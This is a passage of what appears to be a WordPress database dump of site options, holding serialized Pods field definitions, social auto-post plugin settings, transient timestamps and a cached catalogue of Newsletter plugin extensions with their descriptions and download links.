:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}}}','off'),(5414576,'bit_social_allow_tracking','1','auto'),(5414577,'bit_social_tracking_notice_dismissed','1','auto'),(5414578,'bit_social_changelog_version','1.13.3','auto'),(5414579,'bit_social_tracking_last_sended_at','1781834972','auto'),(5414606,'bit_social_auto_post_settings','a:6:{s:9:\"isEnabled\";b:1;s:8:\"keepLogs\";b:1;s:10:\"taxonomies\";a:2:{i:0;s:10:\"categories\";i:1;s:4:\"tags\";}s:8:\"accounts\";a:2:{s:10:\"accountIds\";a:1:{i:0;i:1;}s:8:\"groupIds\";a:0:{}}s:8:\"postType\";a:1:{i:0;s:4:\"post\";}s:9:\"postDelay\";a:2:{s:5:\"every\";i:0;s:4:\"unit\";s:0:\"\";}}','auto'),(5638781,'_transient_timeout_pods_9f8f571f17a39d66756cfd5fac34afed','1782503154','off'),(5301805,'_site_transient_ai1wm_last_check_for_updates','1782103443','off'),(5382277,'iclcat_261','a:0:{}','auto'),(5597767,'elementor_pro_remote_info_api_data_3.7.7','a:2:{s:7:\"timeout\";i:1781068307;s:5:\"value\";s:42:\"{\"license\":\"valid\",\"expires\":\"01.01.2030\"}\";}','off'),(5642839,'_transient_timeout_tnp_extensions_json','1782296880','off'),(5642840,'_transient_tnp_extensions_json','[{\"id\":\"123\",\"category\":\"subscription\",\"version\":\"1.0.6\",\"title\":\"MemberPress Integration\",\"description\":\"Integration with MemberPress plugin\",\"slug\":\"newsletter-memberpress\",\"type\":\"integration \",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/premium\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2025\\/05\\/memberpress.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=123\",\"wp_slug\":\"newsletter-memberpress\\/memberpress.php\"},{\"id\":\"113\",\"category\":\"subscription\",\"version\":\"1.1.2\",\"title\":\"WP User Pro Integration\",\"description\":\"Connect subscribers to WP users\",\"slug\":\"newsletter-wpuserspro\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/wpusers\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2023\\/03\\/wpusers-32x32-1.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=113\",\"wp_slug\":\"newsletter-wpuserspro\\/wpuserspro.php\"},{\"id\":\"112\",\"category\":\"delivery\",\"version\":\"1.2.7\",\"title\":\"SMTP2Go\",\"description\":\"Send emails and automatically process bounces and complaints with SMTP2Go\",\"slug\":\"newsletter-smtp2go\",\"type\":\"delivery \",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/account\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/design-32px-outline_newsletter-dev.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=112\",\"wp_slug\":\"newsletter-smtp2go\\/smtp2go.php\"},{\"id\":\"111\",\"category\":\"subscription\",\"version\":\"1.2.6\",\"title\":\"Ultimate Member Integration\",\"description\":\"Create subscriber on registration and manage the in\\/out from lists based on user roles.\",\"slug\":\"newsletter-ultimatemember\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/premium\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2023\\/11\\/ultimatemember.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=111\",\"wp_slug\":\"newsletter-ultimatemember\\/ultimatemember.php\"},{\"id\":\"110\",\"category\":\"subscription\",\"version\":\"1.1.5\",\"title\":\"Paid Membership Pro Addon\",\"description\":\"Collect subscribers and connect lists to membership levels\",\"slug\":\"newsletter-pmpro\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/premium\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2023\\/11\\/pmpro.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=110\",\"wp_slug\":\"newsletter-pmpro\\/pmpro.php\"},{\"id\":\"108\",\"category\":\"subscription\",\"version\":\"1.2.4\",\"title\":\"Forminator Addon\",\"description\":\"Collect subscribers using Formnator forms\",\"slug\":\"newsletter-forminator\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/premium\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2023\\/10\\/forminator-32x32-1.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=108\",\"wp_slug\":\"newsletter-forminator\\/forminator.php\"},{\"id\":\"87\",\"category\":\"legacy\",\"version\":\"1.0.5\",\"title\":\"Speed and Delivery Hours Control\",\"description\":\"Configure a different delivery speed for each newsletter and the delivery hours window. Only for regular newsletters.\",\"slug\":\"newsletter-speedcontrol\",\"type\":\"legacy\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/account\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2018\\/12\\/speedcontrol.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=87\",\"wp_slug\":\"newsletter-speedcontrol\\/speedcontrol.php\"},{\"id\":\"127\",\"category\":\"delivery\",\"version\":\"1.0.2\",\"title\":\"Resend\",\"description\":\"Send your newsletter with Resend and manage bounces and compaints automatically.\",\"slug\":\"newsletter-resend\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/premium\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2026\\/03\\/resend-icon-32x32-1.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=127\",\"wp_slug\":\"newsletter-resend\\/resend.php\"},{\"id\":\"73\",\"category\":\"subscription\",\"version\":\"1.4.9\",\"title\":\"WP Users Integration\",\"description\":\"Connects the WordPress user registration with Newsletter subscription. Optionally imports all WP users as subscribers.\",\"slug\":\"newsletter-wpusers\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/extended-features\\/wpusers-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2023\\/03\\/wpusers-32x32-1.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=73\",\"wp_slug\":\"newsletter-wpusers\\/wpusers.php\"},{\"id\":\"61\",\"category\":\"subscription\",\"version\":\"4.5.3\",\"title\":\"Contact Form 7 Connect\",\"description\":\"Collect subscribers with your Contact Form 7 plugin.\",\"slug\":\"newsletter-cf7\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/integrations\\/contact-form-7-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2023\\/10\\/contact-form-7-icon.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=61\",\"wp_slug\":\"newsletter-cf7\\/cf7.php\"},{\"id\":\"101\",\"category\":\"subscription\",\"version\":\"1.2.5\",\"title\":\"Gravity Forms Connect\",\"description\":\"Collect subscribers with your Gravity Forms plugin.\",\"slug\":\"newsletter-gravityforms\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/integrations\\/gravityforms-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2021\\/04\\/gravityforms.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=101\",\"wp_slug\":\"newsletter-gravityforms\\/gravityforms.php\"},{\"id\":\"83\",\"category\":\"subscription\",\"version\":\"1.3.1\",\"title\":\"Ninja Forms Connect\",\"description\":\"Integrate Ninja Forms with Newsletter collecting subscription from your contact form.\",\"slug\":\"newsletter-ninjaforms\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/integrations\\/ninjaforms-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2021\\/08\\/ninjaforms.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=83\",\"wp_slug\":\"newsletter-ninjaforms\\/ninjaforms.php\"},{\"id\":\"84\",\"category\":\"subscription\",\"version\":\"1.4.3\",\"title\":\"WP Forms Connect\",\"description\":\"Collect subscribers with your WP Forms plugin.\",\"slug\":\"newsletter-wpforms\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/integrations\\/wpforms-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2021\\/08\\/wpforms.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=84\",\"wp_slug\":\"newsletter-wpforms\\/wpforms.php\"},{\"id\":\"99\",\"category\":\"subscription\",\"version\":\"1.2.3\",\"title\":\"Elementor Forms Addon\",\"description\":\"Integrates Elementor forms with Newsletter to collect subscription by forms created with Elementor.\",\"slug\":\"newsletter-elementor\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/integrations\\/elementor-extension\\/\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2021\\/04\\/elementor.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=99\",\"wp_slug\":\"newsletter-elementor\\/elementor.php\"},{\"id\":\"109\",\"category\":\"newsletters\",\"version\":\"1.0.9\",\"title\":\"AI Assistant (alpha)\",\"description\":\"Get help with email subjects by AI Assistant (alpha=\",\"slug\":\"newsletter-ai\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/account\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2023\\/11\\/newsletter-ai.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=109\",\"wp_slug\":\"newsletter-ai\\/ai.php\"},{\"id\":\"107\",\"category\":\"subscription\",\"version\":\"1.2.1\",\"title\":\"Formidable Forms Connect\",\"description\":\"Collect subscribers using Formidable Forms\",\"slug\":\"newsletter-formidable\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/premium\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2023\\/10\\/formidable-logo.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=107\",\"wp_slug\":\"newsletter-formidable\\/formidable.php\"},{\"id\":\"104\",\"category\":\"subscription\",\"version\":\"1.1.3\",\"title\":\"Form Designer\",\"description\":\"Visual designer for subscription forms\",\"slug\":\"newsletter-forms\",\"type\":\"extension\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/account\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2023\\/02\\/forms-addon-icon-32x32-1.png\",\"free\":true,\"downloadable\":true,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=104\",\"wp_slug\":\"newsletter-forms\\/forms.php\"},{\"id\":\"60\",\"category\":\"delivery\",\"version\":\"1.6.5\",\"title\":\"Amazon SES\",\"description\":\"Send emails and automatically process bounces and complaints with Amazon Simple Email Service.\",\"slug\":\"newsletter-amazon\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/delivery-addons\\/amazon-ses-extension\\/\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/design-32px-outline_newsletter-dev.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=60\",\"wp_slug\":\"newsletter-amazon\\/amazon.php\"},{\"id\":\"116\",\"category\":\"delivery\",\"version\":\"1.1.5\",\"title\":\"PostMark Integration\",\"description\":\"Send newsletters using the PostMark delivery service\",\"slug\":\"newsletter-postmark\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/premium\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2024\\/09\\/postmark-32x32-1.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=116\",\"wp_slug\":\"newsletter-postmark\\/postmark.php\"},{\"id\":\"65\",\"category\":\"delivery\",\"version\":\"4.3.7\",\"title\":\"Mailgun\",\"description\":\"Send emails and automatically process bounces with Mailgun.\",\"slug\":\"newsletter-mailgun\",\"type\":\"delivery\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/documentation\\/addons\\/delivery-addons\\/mailgun-extension\\/\",\"image\":\"https:\\/\\/cdn.thenewsletterplugin.com\\/extensions\\/design-32px-outline_newsletter-dev.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=65\",\"wp_slug\":\"newsletter-mailgun\\/mailgun.php\"},{\"id\":\"125\",\"category\":\"newsletters\",\"version\":\"1.0.4\",\"title\":\"WP Event Manager\",\"description\":\"Integration with the WP Event Manager plugin\",\"slug\":\"newsletter-wpeventmanager\",\"type\":\"integration\",\"url\":\"https:\\/\\/www.thenewsletterplugin.com\\/premium\",\"image\":\"https:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/uploads\\/2025\\/09\\/wpeventmanager-32x32-1.png\",\"free\":false,\"downloadable\":false,\"download_url\":\"http:\\/\\/www.thenewsletterplugin.com\\/wp-content\\/plugins\\/file-commerce-pro\\/get.php?f=125\",\"wp_slug\":\"newsletter-wpeventmanager\\/wpeventmanager.php\"},{\"id\":\"48\",\"category\":\"delivery\",\"version\":\"4.5.6\",\"title\":\"SendGrid\",\"description\":\"Send emails and automatically process bounces with 